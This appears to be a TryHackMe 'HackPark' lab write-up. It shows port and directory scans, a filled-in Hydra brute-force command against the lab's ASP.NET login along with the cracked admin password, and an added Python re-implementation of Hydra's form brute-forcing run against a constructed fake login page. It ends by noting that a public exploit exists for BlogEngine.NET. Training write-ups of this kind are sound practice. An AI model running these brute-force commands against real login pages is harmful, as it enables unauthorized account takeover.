https://tryhackme.com/room/hackpark
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries
| /Account/*.* /search /search.aspx /error404.aspx
|_/archive /archive.aspx
|_http-title: hackpark | hackpark amusements
|_http-server-header: Microsoft-IIS/8.5
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: HACKPARK
| NetBIOS_Domain_Name: HACKPARK
| NetBIOS_Computer_Name: HACKPARK
| DNS_Domain_Name: hackpark
| DNS_Computer_Name: hackpark
| Product_Version: 6.3.9600
|_ System_Time: 2022-07-22T04:19:27+00:00
| ssl-cert: Subject: commonName=hackpark
| Not valid before: 2022-07-21T04:17:06
|_Not valid after: 2023-01-20T04:17:06
|_ssl-date: 2022-07-22T04:19:30+00:00; +1s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u http://10.10.46.106:80/ -w /usr/share/wordlists/dirb/common.txt -q -t 200
/account (Status: 301) [Size: 154] [--> http://10.10.46.106:80/account/]
/Admin (Status: 302) [Size: 172] [--> http://10.10.46.106/Account/login.aspx?ReturnURL=/Admin]
/ADMIN (Status: 302) [Size: 172] [--> http://10.10.46.106/Account/login.aspx?ReturnURL=/ADMIN]
/admin (Status: 302) [Size: 172] [--> http://10.10.46.106/Account/login.aspx?ReturnURL=/admin]
/Archive (Status: 200) [Size: 8312]
/aspnet_client (Status: 301) [Size: 160] [--> http://10.10.46.106:80/aspnet_client/]
/aux (Status: 500) [Size: 1763]
/Blog (Status: 500) [Size: 1208]
/blog (Status: 500) [Size: 1208]
/archives (Status: 200) [Size: 8313]
/archive (Status: 200) [Size: 8312]
/com2 (Status: 500) [Size: 1763]
/com3 (Status: 500) [Size: 1763]
/com1 (Status: 500) [Size: 1763]
/con (Status: 500) [Size: 1763]
/contact (Status: 200) [Size: 9922]
/contact-form (Status: 200) [Size: 9927]
/contact_bean (Status: 200) [Size: 9927]
/contact_us (Status: 200) [Size: 9925]
/Contact (Status: 200) [Size: 9922]
/contactinfo (Status: 200) [Size: 9926]
/contacts (Status: 200) [Size: 9923]
/contactus (Status: 200) [Size: 9924]
/contacto (Status: 200) [Size: 9923]
/contact-us (Status: 200) [Size: 9925]
/Content (Status: 301) [Size: 154] [--> http://10.10.46.106:80/Content/]
/content (Status: 301) [Size: 154] [--> http://10.10.46.106:80/content/]
/ContactUs (Status: 200) [Size: 9924]
/custom (Status: 301) [Size: 153] [--> http://10.10.46.106:80/custom/]
/default_logo (Status: 500) [Size: 1763]
/default_image (Status: 500) [Size: 1763]
/Default (Status: 500) [Size: 1763]
/default (Status: 500) [Size: 1763]
/default_page (Status: 500) [Size: 1763]
/default_icon (Status: 500) [Size: 1763]
/defaults (Status: 500) [Size: 1763]
/default_pages (Status: 500) [Size: 1763]
/fonts (Status: 301) [Size: 152] [--> http://10.10.46.106:80/fonts/]
/lpt2 (Status: 500) [Size: 1763]
/lpt1 (Status: 500) [Size: 1763]
/nul (Status: 500) [Size: 1763]
/prn (Status: 500) [Size: 1763]
/robots.txt (Status: 200) [Size: 303]
/scripts (Status: 301) [Size: 154] [--> http://10.10.46.106:80/scripts/]
/Scripts (Status: 301) [Size: 154] [--> http://10.10.46.106:80/Scripts/]
/Search (Status: 200) [Size: 8394]
/search_results (Status: 200) [Size: 8402]
/search-results (Status: 200) [Size: 8402]
/searchresults (Status: 200) [Size: 8401]
/setup (Status: 302) [Size: 174] [--> http://10.10.46.106/Account/login.aspx?ReturnUrl=%2fsetup]
/search (Status: 200) [Size: 8394]
/search_result (Status: 200) [Size: 8401]
/searchurl (Status: 200) [Size: 8397]
/searchnx (Status: 200) [Size: 8396]
The room's hint says the username is admin and gives the following Hydra template:
hydra -l <username> -P /usr/share/wordlists/<wordlist> <ip> http-post-form
After filling in the username, the wordlist, the target IP and the login form's POST parameters, this is the brute-force command:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.46.106 http-post-form "/Account/login.aspx:__VIEWSTATE=egYsj6iXHr7jPxSEBMZxFte7PIFCkO7MQ7B0is1XKP5YVIoxXAOy0JsaC5TrDNCrvtghp1Rff4%2BJYnVziNqfXUxKeUniShOv91MA4gMucjQZbLe3ZP89eGZAl9fR2ILCdW0zqbq%2B3L7gV4MsCDNO%2FQ4EATxLuqzJpCX5KpBT%2Bx0U9nbT&__EVENTVALIDATION=O9TGZHlWJqCcqw%2BXQTkrcMNWSrefUcB37%2F8LhNHXwr%2BSTU%2F51HUum7E2N4AJlIq7THxNa2P%2F7U3AOv9LBIArjirFDgQ8s0HuYuOOoDt%2FAvjILCTjd3jAhOmqkolzqn%2BUKl4MsQ5qxW%2BZO24w9SH8W6ZzIZTtF5Vgj3zOe9AeANfn4jJa&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
The http-post-form argument has three colon-separated parts: the login path, the POST body captured with Burp Suite (with ^USER^ and ^PASS^ substituted into the username and password fields), and the string "Login failed" that the page returns for a bad login. The __VIEWSTATE and __EVENTVALIDATION values are copied straight from the captured request. Hydra reports the hit:
[80][http-post-form] host: 10.10.46.106 login: admin password: 1qaz2wsx
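Added example, not code from the write-up or from Hydra itself: a small Python re-implementation of what the http-post-form module does above, so the three colon-separated parts of the spec and the ^USER^/^PASS^ substitution can be stepped through offline. It reuses the page's form field names, but the fake ASP.NET login responder, its __VIEWSTATE value "dummyViewstate", the four-entry candidate list and the success marker "<title>Dashboard</title>" are all constructed here. It also shows the check worth running before a long brute force: a deliberately wrong password must produce the failure string, otherwise any unexpected response (for example a stale __VIEWSTATE being rejected) is reported as a valid login.

```python
"""Re-implementation of Hydra's http-post-form logic against a constructed
fake login page (added example, not from the write-up or from Hydra)."""
from typing import Callable, List, Optional, Tuple
from urllib.parse import parse_qs, quote_plus

# A "poster" takes (path, urlencoded body) and returns the response body.
Poster = Callable[[str, str], str]

# Field names as captured from the HackPark login form (from the page).
USER_FIELD = "ctl00$MainContent$LoginUser$UserName"
PASS_FIELD = "ctl00$MainContent$LoginUser$Password"

VIEWSTATE = "dummyViewstate"  # constructed; the real value comes from Burp
SPEC = ("/Account/login.aspx:__VIEWSTATE=" + VIEWSTATE
        + "&ctl00%24MainContent%24LoginUser%24UserName=^USER^"
        + "&ctl00%24MainContent%24LoginUser%24Password=^PASS^"
        + "&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed")
CANDIDATES = ["123456", "password", "1qaz2wsx", "letmein"]  # constructed mini wordlist


def parse_post_form_spec(spec: str) -> Tuple[str, str, str, bool]:
    """Split "<path>:<body>:<condition>". Returns (path, body template,
    match string, match_means_success). "S=" marks a success string; "F=" or
    a bare string marks the failure string (the default)."""
    parts = spec.split(":")
    if len(parts) < 3:
        raise ValueError("spec must be path:body:condition")
    path, cond = parts[0], parts[-1]
    body = ":".join(parts[1:-1])  # the body itself may contain ':'
    if cond.startswith("S="):
        return path, body, cond[2:], True
    if cond.startswith("F="):
        return path, body, cond[2:], False
    return path, body, cond, False


def fill_template(body_template: str, user: str, password: str) -> str:
    """Substitute ^USER^/^PASS^, URL-encoding them: the body is form-urlencoded."""
    return body_template.replace("^USER^", quote_plus(user)).replace("^PASS^", quote_plus(password))


def classify(response: str, match: str, match_means_success: bool) -> bool:
    """True when the response counts as a valid login under the condition."""
    present = match in response
    return present if match_means_success else not present


def brute_force(spec: str, user: str, candidates: List[str], post: Poster) -> Optional[str]:
    """Return the first candidate the condition classifies as a valid login."""
    path, body_t, match, success = parse_post_form_spec(spec)
    # Canary: an impossible password must classify as a failure. If it does
    # not, the condition string is wrong and every attempt would "succeed".
    canary = fill_template(body_t, user, "not-the-password-" + "x" * 40)
    if classify(post(path, canary), match, success):
        raise RuntimeError("condition never matched a failed login; fix the spec")
    for pw in candidates:
        if classify(post(path, fill_template(body_t, user, pw)), match, success):
            return pw
    return None


def make_fake_aspnet_login(valid_user: str, valid_pass: str, viewstate: str) -> Poster:
    """Constructed stand-in for the BlogEngine login page: it rejects a stale
    __VIEWSTATE with a generic error and otherwise answers like the real form."""
    def post(path: str, body: str) -> str:
        if path != "/Account/login.aspx":
            return "404 Not Found"
        fields = parse_qs(body, keep_blank_values=True)  # decodes %24 -> '$'
        if fields.get("__VIEWSTATE", [""])[0] != viewstate:
            # This response lacks "Login failed", so a failure-string
            # condition would report it as a successful login.
            return "<html>Invalid viewstate.</html>"
        if (fields.get(USER_FIELD, [""])[0] == valid_user
                and fields.get(PASS_FIELD, [""])[0] == valid_pass):
            return "<html><title>Dashboard</title></html>"
        return "<html>Login failed</html>"
    return post


def demo_failure_string() -> Optional[str]:
    """Failure-string condition, as on the page: finds the password."""
    post = make_fake_aspnet_login("admin", "1qaz2wsx", VIEWSTATE)
    return brute_force(SPEC, "admin", CANDIDATES, post)


def demo_success_string() -> Optional[str]:
    """Same run with an S= success condition instead."""
    spec = SPEC.rsplit(":", 1)[0] + ":S=<title>Dashboard</title>"
    post = make_fake_aspnet_login("admin", "1qaz2wsx", VIEWSTATE)
    return brute_force(spec, "admin", CANDIDATES, post)


def demo_stale_viewstate() -> str:
    """The server's token rotated: the canary aborts instead of a false hit."""
    post = make_fake_aspnet_login("admin", "1qaz2wsx", "rotatedViewstate")
    try:
        brute_force(SPEC, "admin", CANDIDATES, post)
        return "false-positive"
    except RuntimeError:
        return "aborted"


if __name__ == "__main__":
    print("failure-string run:", demo_failure_string())
    print("success-string run:", demo_success_string())
    print("stale viewstate run:", demo_stale_viewstate())
```

Hydra's real module also accepts S= for a success string and further colon-separated options such as extra headers; only the path:body:condition form used on this page is handled here. The canary step is the part to keep in mind when the real tool reports a hit after one attempt: confirm the response actually lacks the failure string before trusting it.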
After logging in and looking around, we find that the site runs BlogEngine.NET version 3.3.6.0.
A quick Google search turns up a public exploit for this version.